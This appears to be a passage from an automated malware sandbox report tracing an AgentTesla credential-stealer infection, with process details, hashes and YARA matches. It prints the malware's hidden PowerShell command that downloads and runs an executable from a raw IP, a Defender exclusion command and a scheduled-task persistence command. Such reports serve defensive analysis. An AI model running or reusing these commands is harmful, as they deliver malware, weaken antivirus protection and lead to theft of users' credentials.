• Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.429522504.0000000000170000.00000004.00000020.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 18:21:22
Start date: 25/11/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'"
Imagebase: 0x13f870000
File size: 473600 bytes
MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000005.00000002.424289946.0000000000360000.00000004.00000020.sdmp, Author: Florian Roth
Reputation: high

General

Start time: 18:21:22
Start date: 25/11/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'"
Imagebase: 0x13f870000
File size: 473600 bytes
MD5 hash: 852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 18:21:28
Start date: 25/11/2021
Path: C:\Users\user\AppData\Roaming\task.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\task.exe"
Imagebase: 0xcf0000
File size: 504832 bytes
MD5 hash: F65B0793251364C03D06E8E7134FC21B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 18:21:32
Start date: 25/11/2021
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe"
Imagebase: 0x220f0000
File size: 452608 bytes
MD5 hash: 92F44E405DB16AC55D97E3BFE3B132FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: high

General

Start time: 18:21:33
Start date: 25/11/2021
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp"
Imagebase: 0xe0000
File size: 179712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 18:21:35
Start date: 25/11/2021
Path: C:\Users\user\AppData\Roaming\task.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\task.exe
Imagebase: 0xcf0000
File size: 504832 bytes
MD5 hash: F65B0793251364C03D06E8E7134FC21B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time:18:21:42
Start date:25/11/2021
Path:C:\Windows\System32\verclsid.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Imagebase:0xffd50000
File size:11776 bytes
MD5 hash:3796AE13F680D9239210513EDA590E86
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

General

Start time:18:21:43
Start date:25/11/2021
Path:C:\Windows\System32\notepad.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT
Imagebase:0xff970000
File size:193536 bytes
MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate

Disassembly

Code Analysis
